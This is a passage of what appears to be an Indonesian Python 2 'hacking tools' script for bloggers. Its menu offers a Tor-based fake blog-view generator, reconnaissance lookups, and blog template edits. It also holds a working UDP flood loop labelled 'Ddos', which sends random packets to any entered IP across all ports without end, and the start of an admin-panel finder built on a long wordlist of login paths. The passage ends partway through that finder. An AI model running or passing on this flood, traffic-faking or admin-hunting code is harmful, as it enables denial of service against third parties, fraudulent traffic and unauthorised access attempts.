def menu():
    menu = w + '''

    #>Visitor
        |__> 1) ''' + y + '''AutoVisitor''' + w + '''
        |__> 2) ''' + y + '''Jingling Web Orang ( Attack ) ''' + c + '''// Premium Tools''' + w + '''
    ''' + g + '''<''' + r + '''+''' + a + '''---------------------------------''' + r + '''+''' + g + '''>''' + w + '''
     #>InfoBlog
        |__> 3) ''' + y + '''All_Info_Web''' + w + '''
        |__> 4) ''' + y + '''TCP Port Scan''' + w + '''
        |__> 5) ''' + y + '''Check Header''' + w + '''
    ''' + g + '''<''' + r + '''+''' + a + '''---------------------------------''' + r + '''+''' + g + '''>''' + w + '''
     #>Setting Blog
        |__> 6) ''' + y + '''Hilangkan ?m=1 di web''' + w + '''
        |__> 7) ''' + y + '''Hilangkan Tanggal Dan Waktu''' + w + '''
    ''' + g + '''<''' + r + '''+''' + a + '''---------------------------------''' + r + '''+''' + g + '''>''' + w + '''
     #>Web Ataccking
        |__> 8) ''' + y + '''Ddos''' + w + '''
        |__> 9) ''' + y + '''Bug Finder ''' + c + '''//Premium''' + w + '''
        |__> 10) ''' + y + '''Admin Finder''' + w + '''
        |__> 11) ''' + y + '''Dorker Tools ''' + c + '''//Premium''' + w + '''
    ''' + g + '''<''' + r + '''+''' + a + '''---------------------------------''' + r + '''+''' + g + '''>''' + w + '''
     #>Tools Info
        |__> 12) ''' + y + '''About Tools''' + w + '''
        |__> 13) ''' + y + '''Contact''' + w + '''
    ''' + g + '''<''' + r + '''+''' + a + '''---------------------------------''' + r + '''+''' + g + '''>'''
    print menu
    men_in = raw_input(g + 'Pilih Tools :' + y)
    if men_in == "1":
        headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
        }
        proxyPort = 9050
        ctrlPort = 9051
        site = raw_input("Enter your Blog Address : ")
        blog = input("Enter The number of Viewers : ")

        def run():
            response = tr.get(site, headers=headers, verify=False)
            print g + "[" + str(
                i) + "]" + " Blog View Added With IP:" + tr.get(
                    'http://ipecho.net/plain').content
            tr.reset_identity()

        if __name__ == '__main__':
            if len(sys.argv) > 3:
                if sys.argv[1] and sys.argv[2]:
                    proxyPort = sys.argv[1]
                    ctrlPort = sys.argv[2]
            with TorRequest(proxy_port=proxyPort,
                            ctrl_port=ctrlPort,
                            password=None) as tr:
                for i in range(blog):
                    run()
    elif men_in == "3":
        print y + 'Don Use Https/http'
        target = raw_input(g + '#> ' + w)

        def ip():
            try:
                IP = socket.gethostbyname(target)
                print "IP address of " + g + target + w + " is " + g + IP + w
            except socket.gaierror:
                print "Unable to resolve " + target

        def http():
            page = o('https://api.hackertarget.com/httpheaders/?q=' +
                     target).read()
            print page

        def dns():
            page = o('https://api.hackertarget.com/dnslookup/?q=' +
                     target).read()
            print page

        def geo():
            IP = socket.gethostbyname(target)
            page = o('https://api.hackertarget.com/geoip/?q=' + IP).read()
            print page

        print '''
  <-----------IP WEB / BLOG----------->'''
        ip()
        print '''
  <-----------PORT----------->'''
        print w + target + g + ':80' + w
        print '''
  <-----------HTTP Header----------->''' + g
        http()
        print w + '''
  <-----------Domain Name Server----------->''' + g
        dns()
        print w + '''
  <-----------Geo Ip----------->''' + g
        geo()
#4####
    if men_in == "4":
        print y + 'Don Use Https/http'
        target = raw_input(g + '#> ' + w)
        page = o('https://api.hackertarget.com/nmap/?q=' + target).read()
        print g + page
#5###
    if men_in == "5":
        print y + 'Don Use Https/http'
        target = raw_input(g + '#> ' + w)
        page = o('https://api.hackertarget.com/httpheaders/?q=' +
                 target).read()
        print
        print g + page


##6###
    if men_in == "6":
        print y + ('Masukan Lokasi Template Blog Anda')
        path = raw_input(g + '#>' + w)

        template = open(path, "r+")
        ganti = '''<script type='text/javascript'>
var uri = window.location.toString(); if (uri.indexOf("%3D","%3D") > 0) {var clean_uri = uri.substring(0, uri.indexOf("%3D")); window.history.replaceState({}, document.title, clean_uri);}var uri = window.location.toString();if (uri.indexOf("%3D%3D","%3D%3D") > 0) {var clean_uri = uri.substring(0, uri.indexOf("%3D%3D")); window.history.replaceState({}, document.title, clean_uri);}
var uri = window.location.toString(); if (uri.indexOf("&m=1","&m=1") > 0) {var clean_uri = uri.substring(0, uri.indexOf("&m=1")); window.history.replaceState({}, document.title, clean_uri);}
var uri = window.location.toString();if (uri.indexOf("?m=1","?m=1") > 0) {var clean_uri = uri.substring(0, uri.indexOf("?m=1")); window.history.replaceState({}, document.title, clean_uri);}
</script></body>'''
        hm = template.read().replace('</body>', ganti)
        al = open('hasil_hilang_m1.xml', 'w')
        al.write(hm)
        al.close()
        template.close()
        print w + '[' + g + '√' + w + ']' + a + 'Success Saved ' + g + 'hasil_hilang_m1.xml' + a + ', Upload (hasil_hilang_m1.xml) ke blog'

    if men_in == "7":
        print y + ('Masukan Lokasi Template Blog Anda')
        path = raw_input(g + '#>' + w)

        template = open(path, "r+")
        ganti = '''<script type='text/javascript'>
//<![CDATA[
// BloggerJS v0.3.1
// Copyright (c) 2017-2018 Kenny Cruz
// Licensed under the MIT License
var urlTotal,nextPageToken,postsDatePrefix=!1,accessOnly=!1,useApiV3=!1,apiKey="",blogId="",postsOrPages=["pages","posts"],jsonIndex=1,secondRequest=!0,feedPriority=0,amp="&amp;"[0];function urlVal(){var e=window.location.pathname,t=e.length;return".html"===e.substring(t-5)?0:t>1?1:2}function urlMod(){var e=window.location.pathname;"p"===e.substring(1,2)?(e=(e=e.substring(e.indexOf("/",1)+1)).substr(0,e.indexOf(".html")),history.replaceState(null,null,"../"+e)):(e=(e=postsDatePrefix?e.substring(1):e.substring(e.indexOf("/",7)+1)).substr(0,e.indexOf(".html")),history.replaceState(null,null,"../../"+e))}function urlSearch(e,t){var n=e+".html";t.forEach(function(e){-1!==e.search(n)&&(window.location=e)})}function urlManager(){var e=urlVal();0===e?accessOnly||urlMod():1===e?getJSON(postsOrPages[feedPriority],1):2===e&&(accessOnly||history.replaceState(null,null,"/"))}function getJSON(e,t){var n=document.createElement("script");if(useApiV3){var o="https://www.googleapis.com/blogger/v3/blogs/"+blogId+"/"+e+"?key="+apiKey+"#maxResults=500#fields=nextPageToken%2Citems(url)#callback=bloggerJSON";nextPageToken&&(o+="#pageToken="+nextPageToken),nextPageToken=void 0}else o=window.location.protocol+"//"+window.location.hostname+"/feeds/"+e+"/default?start-index="+t+"#max-results=150#orderby=published#alt=json-in-script#callback=bloggerJSON";o=o.replace(/#/g,amp),n.type="text/javascript",n.src=o,document.getElementsByTagName("head")[0].appendChild(n)}function bloggerJSON(e){var t=[];if(useApiV3||void 0===urlTotal&&(urlTotal=parseInt(e.feed.openSearch$totalResults.$t)),useApiV3){try{e.items.forEach(function(e,n){t.push(e.url)})}catch(e){}nextPageToken=e.nextPageToken}else try{e.feed.entry.forEach(function(n,o){var r=e.feed.entry[o];r.link.forEach(function(e,n){"alternate"===r.link[n].rel&&t.push(r.link[n].href)})})}catch(e){}urlSearch(window.location.pathname,t),urlTotal>150?(jsonIndex+=150,urlTotal-=150,getJSON(postsOrPages[feedPriority],jsonIndex)):nextPageToken?getJSON(postsOrPages[feedPriority]):secondRequest&&(nextPageToken=void 0,urlTotal=void 0,jsonIndex=1,secondRequest=!1,0===feedPriority?(feedPriority=1,getJSON("posts",1)):1===feedPriority&&(feedPriority=0,getJSON("pages",1)))}function bloggerJS(e){e&&(feedPriority=e),urlManager()}bloggerJS();
//]]>
</script></body>'''
        hm = template.read().replace('</body>', ganti)
        al = open('hasil_hilang_m1.xml', 'w')
        al.write(hm)
        al.close()
        template.close()
        print w + '[' + g + '√' + w + ']' + a + 'Success Saved ' + g + 'hasil_hilang_m1.xml' + a + ', Upload (hasil_hilang_m1.xml) ke blog'
    if men_in == "8":
        now = datetime.now()
        hour = now.hour
        minute = now.minute
        day = now.day
        month = now.month
        year = now.year
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        bytes = random._urandom(1490)
        ip = raw_input(g + "IP Target : " + w)
        port = input(g + "Port       : " + w)
        sent = 0
        while True:
            sock.sendto(bytes, (ip, port))
            sent = sent + 1
            port = port + 1
            print g + "Kirim %s Virus Ke %s Dengan Port:%s" % (sent, ip, port)
            if port == 65534:
                port = 1

    if men_in == "10":
        url = raw_input(g + 'Target : ' + w)
        passe = (
            'admin/',
            'administrator/',
            'login.php',
            'administration/',
            'admin1/',
            'admin2/',
            'admin3/',
            'admin4/',
            'admin5/',
            'moderator/',
            'webadmin/',
            'adminarea/',
            'bb-admin/',
            'adminLogin/',
            'admin_area/',
            'panel-administracion/',
            'instadmin/',
            'memberadmin/',
            'administratorlogin/',
            'adm/',
            'account.asp',
            'admin/account.asp',
            'admin/index.asp',
            'admin/login.asp',
            'admin/admin.asp',
            '/login.aspx',
            'admin_area/admin.asp',
            'admin_area/login.asp',
            'admin/account.html',
            'admin/index.html',
            'admin/login.html',
            'admin/admin.html',
            'admin_area/admin.html',
            'admin_area/login.html',
            'admin_area/index.html',
            'admin_area/index.asp',
            'bb-admin/index.asp',
            'bb-admin/login.asp',
            'bb-admin/admin.asp',
            'bb-admin/index.html',
            'bb-admin/login.html',
            'bb-admin/admin.html',
            'admin/home.html',
            'admin/controlpanel.html',
            'admin.html',
            'admin/cp.html',
            'cp.html',
            'administrator/index.html',
            'administrator/login.html',
            'administrator/account.html',
            'administrator.html',
            'login.html',
            'modelsearch/login.html',
            'moderator.html',
            'moderator/login.html',
            'moderator/admin.html',
            'account.html',
            'controlpanel.html',
            'admincontrol.html',
            'admin_login.html',
            'panel-administracion/login.html',
            'admin/home.asp',
            'admin/controlpanel.asp',
            'admin.asp',
            'pages/admin/admin-login.asp',
            'admin/admin-login.asp',
            'admin-login.asp',
            'admin/cp.asp',
            'cp.asp',
            'administrator/account.asp',
            'administrator.asp',
            'acceso.asp',
            'login.asp',
            'modelsearch/login.asp',
            'moderator.asp',
            'moderator/login.asp',
            'administrator/login.asp',
            'moderator/admin.asp',
            'controlpanel.asp',
            'admin/account.html',
            'adminpanel.html',
            'webadmin.html',
            'administration',
            'pages/admin/admin-login.html',
            'admin/admin-login.html',
            'webadmin/index.html',
            'webadmin/admin.html',
            'webadmin/login.html',
            'user.asp',
            'user.html',
            'admincp/index.asp',
            'admincp/login.asp',
            'admincp/index.html',
            'admin/adminLogin.html',
            'adminLogin.html',
            'admin/adminLogin.html',
            'home.html',
            'adminarea/index.html',
            'adminarea/admin.html',
            'adminarea/login.html',
            'panel-administracion/index.html',
            'panel-administracion/admin.html',
            'modelsearch/index.html',
            'modelsearch/admin.html',
            'admin/admin_login.html',
            'admincontrol/login.html',
            'adm/index.html',
            'adm.html',
            'admincontrol.asp',
            'admin/account.asp',
            'adminpanel.asp',
            'webadmin.asp',
            'webadmin/index.asp',
            'webadmin/admin.asp',
            'webadmin/login.asp',
            'admin/admin_login.asp',
            'admin_login.asp',
            'panel-administracion/login.asp',
            'adminLogin.asp',
            'admin/adminLogin.asp',
            'home.asp',
            'admin.asp',
            'adminarea/index.asp',
            'adminarea/admin.asp',
            'adminarea/login.asp',
            'admin-login.html',
            'panel-administracion/index.asp',
            'panel-administracion/admin.asp',
            'modelsearch/index.asp',
            'modelsearch/admin.asp',
            'administrator/index.asp',
            'admincontrol/login.asp',
            'adm/admloginuser.asp',
            'admloginuser.asp',
            'admin2.asp',
            'admin2/login.asp',
            'admin2/index.asp',
            'adm/index.asp',
            'adm.asp',
            'affiliate.asp',
            'adm_auth.asp',
            'memberadmin.asp',
            'administratorlogin.asp',
            'siteadmin/login.asp',
            'siteadmin/index.asp',
            'siteadmin/login.html',
            'memberadmin/',
            'administratorlogin/',
            'adm/',
            'admin/account.php',
            'admin/index.php',
            'admin/login.php',
            'admin/admin.php',
            'admin/account.php',
            'admin_area/admin.php',
            'admin_area/login.php',
            'siteadmin/login.php',
            'siteadmin/index.php',
            'siteadmin/login.html',
            'admin/account.html',
            'admin/index.html',
            'admin/login.html',
            'admin/admin.html',
            'admin_area/index.php',
            'bb-admin/index.php',
            'bb-admin/login.php',
            'bb-admin/admin.php',
            'admin/home.php',
            'admin_area/login.html',
            'admin_area/index.html',
            'admin/controlpanel.php',
            'admin.php',
            'admincp/index.asp',
            'admincp/login.asp',
            'admincp/index.html',
            'admin/account.html',
            'adminpanel.html',
            'webadmin.html',
            'webadmin/index.html',
            'webadmin/admin.html',
            'webadmin/login.html',
            'admin/admin_login.html',
            'admin_login.html',
            'panel-administracion/login.html',
            'admin/cp.php',
            'cp.php',
            'administrator/index.php',
            'administrator/login.php',
            'nsw/admin/login.php',
            'webadmin/login.php',
            'admin/admin_login.php',
            'admin_login.php',
            'administrator/account.php',
            'administrator.php',
            'admin_area/admin.html',
            'pages/admin/admin-login.php',
            'admin/admin-login.php',
            'admin-login.php',
            'bb-admin/index.html',
            'bb-admin/login.html',
            'acceso.php',
            'bb-admin/admin.html',
            'admin/home.html',
            'login.php',
            'modelsearch/login.php',
            'moderator.php',
            'moderator/login.php',
            'moderator/admin.php',
            'account.php',
            'pages/admin/admin-login.html',
            'admin/admin-login.html',
            'admin-login.html',
            'controlpanel.php',
            'admincontrol.php',
            'admin/adminLogin.html',
            'adminLogin.html',
            'admin/adminLogin.html',
            'home.html',
            'rcjakar/admin/login.php',
            'adminarea/index.html',
            'adminarea/admin.html',
            'webadmin.php',
            'webadmin/index.php',
            'webadmin/admin.php',
            'admin/controlpanel.html',
            'admin.html',
            'admin/cp.html',
            'cp.html',
            'adminpanel.php',
            'moderator.html',
            'administrator/index.html',
            'administrator/login.html',
            'user.html',
            'administrator/account.html',
            'administrator.html',
            'login.html',
            'modelsearch/login.html',
            'moderator/login.html',
            'adminarea/login.html',
            'panel-administracion/index.html',
            'panel-administracion/admin.html',
            'modelsearch/index.html',
            'modelsearch/admin.html',
            'admincontrol/login.html',
            'adm/index.html',
            'adm.html',
            'moderator/admin.html',
            'user.php',
            'account.html',
            'controlpanel.html',
            'admincontrol.html',
            'panel-administracion/login.php',
            'wp-login.php',
            'adminLogin.php',
            'admin/adminLogin.php',
            'home.php',
            'admin.php',
            'adminarea/index.php',
            'adminarea/admin.php',
            'adminarea/login.php',
            'panel-administracion/index.php',
            'panel-administracion/admin.php',
            'modelsearch/index.php',
            'modelsearch/admin.php',
            'admincontrol/login.php',
            'adm/admloginuser.php',
            'admloginuser.php',
            'admin2.php',
            'admin2/login.php',
            'admin2/index.php',
            'usuarios/login.php',
            'adm/index.php',
            'adm.php',
            'affiliate.php',
            'adm_auth.php',
            'memberadmin.php',
            'administratorlogin.php',
            'adm/',
            'admin/account.cfm',
            'admin/index.cfm',
            'admin/login.cfm',
            'admin/admin.cfm',
            'admin/account.cfm',
            'admin_area/admin.cfm',
            'admin_area/login.cfm',
            'siteadmin/login.cfm',
            'siteadmin/index.cfm',
            'siteadmin/login.html',
            'admin/account.html',
            'admin/index.html',
            'admin/login.html',
            'admin/admin.html',
            'admin_area/index.cfm',
            'bb-admin/index.cfm',
            'bb-admin/login.cfm',
            'bb-admin/admin.cfm',
            'admin/home.cfm',
            'admin_area/login.html',
            'admin_area/index.html',
            'admin/controlpanel.cfm',
            'admin.cfm',
            'admincp/index.asp',
            'admincp/login.asp',
            'admincp/index.html',
            'admin/account.html',
            'adminpanel.html',
            'webadmin.html',
            'webadmin/index.html',
            'webadmin/admin.html',
            'webadmin/login.html',
            'admin/admin_login.html',
            'admin_login.html',
            'panel-administracion/login.html',
            'admin/cp.cfm',
            'cp.cfm',
            'administrator/index.cfm',
            'administrator/login.cfm',
            'nsw/admin/login.cfm',
            'webadmin/login.cfm',
            'admin/admin_login.cfm',
            'admin_login.cfm',
            'administrator/account.cfm',
            'administrator.cfm',
            'admin_area/admin.html',
            'pages/admin/admin-login.cfm',
            'admin/admin-login.cfm',
            'admin-login.cfm',
            'bb-admin/index.html',
            'bb-admin/login.html',
            'bb-admin/admin.html',
            'admin/home.html',
            'login.cfm',
            'modelsearch/login.cfm',
            'moderator.cfm',
            'moderator/login.cfm',
            'moderator/admin.cfm',
            'account.cfm',
            'pages/admin/admin-login.html',
            'admin/admin-login.html',
            'admin-login.html',
            'controlpanel.cfm',
            'admincontrol.cfm',
            'admin/adminLogin.html',
            'acceso.cfm',
            'adminLogin.html',
            'admin/adminLogin.html',
            'home.html',
            'rcjakar/admin/login.cfm',
            'adminarea/index.html',
            'adminarea/admin.html',
            'webadmin.cfm',
            'webadmin/index.cfm',
            'webadmin/admin.cfm',
            'admin/controlpanel.html',
            'admin.html',
            'admin/cp.html',
            'cp.html',
            'adminpanel.cfm',
            'moderator.html',
            'administrator/index.html',
            'administrator/login.html',
            'user.html',
            'administrator/account.html',
            'administrator.html',
            'login.html',
            'modelsearch/login.html',
            'moderator/login.html',
            'adminarea/login.html',
            'panel-administracion/index.html',
            'panel-administracion/admin.html',
            'modelsearch/index.html',
            'modelsearch/admin.html',
            'admincontrol/login.html',
            'adm/index.html',
            'adm.html',
            'moderator/admin.html',
            'user.cfm',
            'account.html',
            'controlpanel.html',
            'admincontrol.html',
            'panel-administracion/login.cfm',
            'wp-login.cfm',
            'adminLogin.cfm',
            'admin/adminLogin.cfm',
            'home.cfm',
            'admin.cfm',
            'adminarea/index.cfm',
            'adminarea/admin.cfm',
            'adminarea/login.cfm',
            'panel-administracion/index.cfm',
            'panel-administracion/admin.cfm',
            'modelsearch/index.cfm',
            'modelsearch/admin.cfm',
            'admincontrol/login.cfm',
            'adm/admloginuser.cfm',
            'admloginuser.cfm',
            'admin2.cfm',
            'admin2/login.cfm',
            'admin2/index.cfm',
            'usuarios/login.cfm',
            'adm/index.cfm',
            'adm.cfm',
            'affiliate.cfm',
            'adm_auth.cfm',
            'memberadmin.cfm',
            'administratorlogin.cfm',
            'adminLogin/',
            'admin_area/',
            'panel-administracion/',
            'instadmin/',
            'login.aspx',
            'memberadmin/',
            'administratorlogin/',
            'adm/',
            'admin/account.aspx',
            'admin/index.aspx',
            'admin/login.aspx',
            'admin/admin.aspx',
            'admin/account.aspx',
            'admin_area/admin.aspx',
            'admin_area/login.aspx',
            'siteadmin/login.aspx',
            'siteadmin/index.aspx',
            'siteadmin/login.html',
            'admin/account.html',
            'admin/index.html',
            'admin/login.html',
            'admin/admin.html',
            'admin_area/index.aspx',
            'bb-admin/index.aspx',
            'bb-admin/login.aspx',
            'bb-admin/admin.aspx',
            'admin/home.aspx',
            'admin_area/login.html',
            'admin_area/index.html',
            'admin/controlpanel.aspx',
            'admin.aspx',
            'admincp/index.asp',
            'admincp/login.asp',
            'admincp/index.html',
            'admin/account.html',
            'adminpanel.html',
            'webadmin.html',
            'webadmin/index.html',
            'webadmin/admin.html',
            'webadmin/login.html',
            'admin/admin_login.html',
            'admin_login.html',
            'panel-administracion/login.html',
            'admin/cp.aspx',
            'cp.aspx',
            'administrator/index.aspx',
            'administrator/login.aspx',
            'nsw/admin/login.aspx',
            'webadmin/login.aspx',
            'admin/admin_login.aspx',
            'admin_login.aspx',
            'administrator/account.aspx',
            'administrator.aspx',
            'admin_area/admin.html',
            'pages/admin/admin-login.aspx',
            'admin/admin-login.aspx',
            'admin-login.aspx',
            'bb-admin/index.html',
            'bb-admin/login.html',
            'bb-admin/admin.html',
            'admin/home.html',
            'login.aspx',
            'modelsearch/login.aspx',
            'moderator.aspx',
            'moderator/login.aspx',
            'moderator/admin.aspx',
            'acceso.aspx',
            'account.aspx',
            'pages/admin/admin-login.html',
            'admin/admin-login.html',
            'admin-login.html',
            'controlpanel.aspx',
            'admincontrol.aspx',
            'admin/adminLogin.html',
            'adminLogin.html',
            'admin/adminLogin.html',
            'home.html',
            'rcjakar/admin/login.aspx',
            'adminarea/index.html',
            'adminarea/admin.html',
            'webadmin.aspx',
            'webadmin/index.aspx',
            'webadmin/admin.aspx',
            'admin/controlpanel.html',
            'admin.html',
            'admin/cp.html',
            'cp.html',
            'adminpanel.aspx',
            'moderator.html',
            'administrator/index.html',
            'administrator/login.html',
            'user.html',
            'administrator/account.html',
            'administrator.html',
            'login.html',
            'modelsearch/login.html',
            'moderator/login.html',
            'adminarea/login.html',
            'panel-administracion/index.html',
            'panel-administracion/admin.html',
            'modelsearch/index.html',
            'modelsearch/admin.html',
            'admincontrol/login.html',
            'adm/index.html',
            'adm.html',
            'moderator/admin.html',
            'user.aspx',
            'account.html',
            'controlpanel.html',
            'admincontrol.html',
            'panel-administracion/login.aspx',
            'wp-login.aspx',
            'adminLogin.aspx',
            'admin/adminLogin.aspx',
            'home.aspx',
            'admin.aspx',
            'adminarea/index.aspx',
            'adminarea/admin.aspx',
            'adminarea/login.aspx',
            'panel-administracion/index.aspx',
            'panel-administracion/admin.aspx',
            'modelsearch/index.aspx',
            'modelsearch/admin.aspx',
            'admincontrol/login.aspx',
            'adm/admloginuser.aspx',
            'admloginuser.aspx',
            'admin2.aspx',
            'admin2/login.aspx',
            'admin2/index.aspx',
            'usuarios/login.aspx',
            'adm/index.aspx',
            'adm.aspx',
            'affiliate.aspx',
            'adm_auth.aspx',
            'memberadmin.aspx',
            'administratorlogin.aspx',
            'memberadmin/',
            'administratorlogin/',
            'adm/',
            'admin/account.js',
            'admin/index.js',
            'admin/login.js',
            'admin/admin.js',
            'admin/account.js',
            'admin_area/admin.js',
            'admin_area/login.js',
            'siteadmin/login.js',
            'siteadmin/index.js',
            'siteadmin/login.html',
            'admin/account.html',
            'admin/index.html',
            'admin/login.html',
            'admin/admin.html',
            'admin_area/index.js',
            'bb-admin/index.js',
            'bb-admin/login.js',
            'bb-admin/admin.js',
            'admin/home.js',
            'admin_area/login.html',
            'admin_area/index.html',
            'admin/controlpanel.js',
            'admin.js',
            'admincp/index.asp',
            'admincp/login.asp',
            'admincp/index.html',
            'admin/account.html',
            'adminpanel.html',
            'webadmin.html',
            'webadmin/index.html',
            'webadmin/admin.html',
            'webadmin/login.html',
            'admin/admin_login.html',
            'admin_login.html',
            'panel-administracion/login.html',
            'admin/cp.js',
            'cp.js',
            'administrator/index.js',
            'administrator/login.js',
            'nsw/admin/login.js',
            'webadmin/login.js',
            'admin/admin_login.js',
            'admin_login.js',
            'administrator/account.js',
            'administrator.js',
            'admin_area/admin.html',
            'pages/admin/admin-login.js',
            'admin/admin-login.js',
            'admin-login.js',
            'bb-admin/index.html',
            'bb-admin/login.html',
            'bb-admin/admin.html',
            'admin/home.html',
            'login.js',
            'modelsearch/login.js',
            'moderator.js',
            'moderator/login.js',
            'moderator/admin.js',
            'account.js',
            'pages/admin/admin-login.html',
            'admin/admin-login.html',
            'admin-login.html',
            'controlpanel.js',
            'admincontrol.js',
            'admin/adminLogin.html',
            'adminLogin.html',
            'admin/adminLogin.html',
            'home.html',
            'rcjakar/admin/login.js',
            'adminarea/index.html',
            'adminarea/admin.html',
            'webadmin.js',
            'webadmin/index.js',
            'acceso.js',
            'webadmin/admin.js',
            'admin/controlpanel.html',
            'admin.html',
            'admin/cp.html',
            'cp.html',
            'adminpanel.js',
            'moderator.html',
            'administrator/index.html',
            'administrator/login.html',
            'user.html',
            'administrator/account.html',
            'administrator.html',
            'login.html',
            'modelsearch/login.html',
            'moderator/login.html',
            'adminarea/login.html',
            'panel-administracion/index.html',
            'panel-administracion/admin.html',
            'modelsearch/index.html',
            'modelsearch/admin.html',
            'admincontrol/login.html',
            'adm/index.html',
            'adm.html',
            'moderator/admin.html',
            'user.js',
            'account.html',
            'controlpanel.html',
            'admincontrol.html',
            'panel-administracion/login.js',
            'wp-login.js',
            'adminLogin.js',
            'admin/adminLogin.js',
            'home.js',
            'admin.js',
            'adminarea/index.js',
            'adminarea/admin.js',
            'adminarea/login.js',
            'panel-administracion/index.js',
            'panel-administracion/admin.js',
            'modelsearch/index.js',
            'modelsearch/admin.js',
            'admincontrol/login.js',
            'adm/admloginuser.js',
            'admloginuser.js',
            'admin2.js',
            'admin2/login.js',
            'admin2/index.js',
            'usuarios/login.js',
            'adm/index.js',
            'adm.js',
            'affiliate.js',
            'adm_auth.js',
            'memberadmin.js',
            'administratorlogin.js',
            'bb-admin/index.cgi',
            'bb-admin/login.cgi',
            'bb-admin/admin.cgi',
            'admin/home.cgi',
            'admin_area/login.html',
            'admin_area/index.html',
            'admin/controlpanel.cgi',
            'admin.cgi',
            'admincp/index.asp',
            'admincp/login.asp',
            'admincp/index.html',
            'admin/account.html',
            'adminpanel.html',
            'webadmin.html',
            'webadmin/index.html',
            'webadmin/admin.html',
            'webadmin/login.html',
            'admin/admin_login.html',
            'admin_login.html',
            'panel-administracion/login.html',
            'admin/cp.cgi',
            'cp.cgi',
            'administrator/index.cgi',
            'administrator/login.cgi',
            'nsw/admin/login.cgi',
            'webadmin/login.cgi',
            'admin/admin_login.cgi',
            'admin_login.cgi',
            'administrator/account.cgi',
            'administrator.cgi',
            'admin_area/admin.html',
            'pages/admin/admin-login.cgi',
            'admin/admin-login.cgi',
            'admin-login.cgi',
            'bb-admin/index.html',
            'bb-admin/login.html',
            'bb-admin/admin.html',
            'admin/home.html',
            'login.cgi',
            'modelsearch/login.cgi',
            'moderator.cgi',
            'moderator/login.cgi',
            'moderator/admin.cgi',
            'account.cgi',
            'pages/admin/admin-login.html',
            'admin/admin-login.html',
            'admin-login.html',
            'controlpanel.cgi',
            'admincontrol.cgi',
            'admin/adminLogin.html',
            'adminLogin.html',
            'admin/adminLogin.html',
            'home.html',
            'rcjakar/admin/login.cgi',
            'adminarea/index.html',
            'adminarea/admin.html',
            'webadmin.cgi',
            'webadmin/index.cgi',
            'acceso.cgi',
            'webadmin/admin.cgi',
            'admin/controlpanel.html',
            'admin.html',
            'admin/cp.html',
            'cp.html',
            'adminpanel.cgi',
            'moderator.html',
            'administrator/index.html',
            'administrator/login.html',
            'user.html',
            'administrator/account.html',
            'administrator.html',
            'login.html',
            'modelsearch/login.html',
            'moderator/login.html',
            'adminarea/login.html',
            'panel-administracion/index.html',
            'panel-administracion/admin.html',
            'modelsearch/index.html',
            'modelsearch/admin.html',
            'admincontrol/login.html',
            'adm/index.html',
            'adm.html',
            'moderator/admin.html',
            'user.cgi',
            'account.html',
            'controlpanel.html',
            'admincontrol.html',
            'panel-administracion/login.cgi',
            'wp-login.cgi',
            'adminLogin.cgi',
            'admin/adminLogin.cgi',
            'home.cgi',
            'admin.cgi',
            'adminarea/index.cgi',
            'adminarea/admin.cgi',
            'adminarea/login.cgi',
            'panel-administracion/index.cgi',
            'panel-administracion/admin.cgi',
            'modelsearch/index.cgi',
            'modelsearch/admin.cgi',
            'admincontrol/login.cgi',
            'adm/admloginuser.cgi',
            'admloginuser.cgi',
            'admin2.cgi',
            'admin2/login.cgi',
            'admin2/index.cgi',
            'usuarios/login.cgi',
            'adm/index.cgi',
            'adm.cgi',
            'affiliate.cgi',
            'adm_auth.cgi',
            'memberadmin.cgi',
            'administratorlogin.cgi',
            'admin_area/admin.brf',
            'admin_area/login.brf',
            'siteadmin/login.brf',
            'siteadmin/index.brf',
            'siteadmin/login.html',
            'admin/account.html',
            'admin/index.html',
            'admin/login.html',
            'admin/admin.html',
            'admin_area/index.brf',
            'bb-admin/index.brf',
            'bb-admin/login.brf',
            'bb-admin/admin.brf',
            'admin/home.brf',
            'admin_area/login.html',
            'admin_area/index.html',
            'admin/controlpanel.brf',
            'admin.brf',
            'admincp/index.asp',
            'admincp/login.asp',
            'admincp/index.html',
            'admin/account.html',
            'adminpanel.html',
            'webadmin.html',
            'webadmin/index.html',
            'webadmin/admin.html',
            'webadmin/login.html',
            'admin/admin_login.html',
            'admin_login.html',
            'panel-administracion/login.html',
            'admin/cp.brf',
            'cp.brf',
            'administrator/index.brf',
            'administrator/login.brf',
            'nsw/admin/login.brf',
            'webadmin/login.brfbrf',
            'admin/admin_login.brf',
            'admin_login.brf',
            'administrator/account.brf',
            'administrator.brf',
            'acceso.brf',
            'admin_area/admin.html',
            'pages/admin/admin-login.brf',
            'admin/admin-login.brf',
            'admin-login.brf',
            'bb-admin/index.html',
            'bb-admin/login.html',
            'bb-admin/admin.html',
            'admin/home.html',
            'login.brf',
            'modelsearch/login.brf',
            'moderator.brf',
            'moderator/login.brf',
            'moderator/admin.brf',
            'account.brf',
            'pages/admin/admin-login.html',
            'admin/admin-login.html',
            'admin-login.html',
            'controlpanel.brf',
            'admincontrol.brf',
            'admin/adminLogin.html',
            'adminLogin.html',
            'admin/adminLogin.html',
            'home.html',
            'rcjakar/admin/login.brf',
            'adminarea/index.html',
            'adminarea/admin.html',
            'webadmin.brf',
            'webadmin/index.brf',
            'webadmin/admin.brf',
            'admin/controlpanel.html',
            'admin.html',
            'admin/cp.html',
            'cp.html',
            'adminpanel.brf',
            'moderator.html',
            'administrator/index.html',
            'administrator/login.html',
            'user.html',
            'administrator/account.html',
            'administrator.html',
            'login.html',
            'modelsearch/login.html',
            'moderator/login.html',
            'adminarea/login.html',
            'panel-administracion/index.html',
            'panel-administracion/admin.html',
            'modelsearch/index.html',
            'modelsearch/admin.html',
            'admincontrol/login.html',
            'adm/index.html',
            'adm.html',
            'moderator/admin.html',
            'user.brf',
            'account.html',
            'controlpanel.html',
            'admincontrol.html',
            'panel-administracion/login.brf',
            'wp-login.brf',
            'adminLogin.brf',
            'admin/adminLogin.brf',
            'home.brf',
            'admin.brf',
            'adminarea/index.brf',
            'adminarea/admin.brf',
            'adminarea/login.brf',
            'panel-administracion/index.brf',
            'panel-administracion/admin.brf',
            'modelsearch/index.brf',
            'modelsearch/admin.brf',
            'admincontrol/login.brf',
            'adm/admloginuser.brf',
            'admloginuser.brf',
            'admin2.brf',
            'admin2/login.brf',
            'admin2/index.brf',
            'usuarios/login.brf',
            'adm/index.brf',
            'adm.brf',
            'affiliate.brf',
            'adm_auth.brf',
            'memberadmin.brf',
            'administratorlogin.brf',
            'cpanel',
            'cpanel.php',
            'cpanel.html',
        )
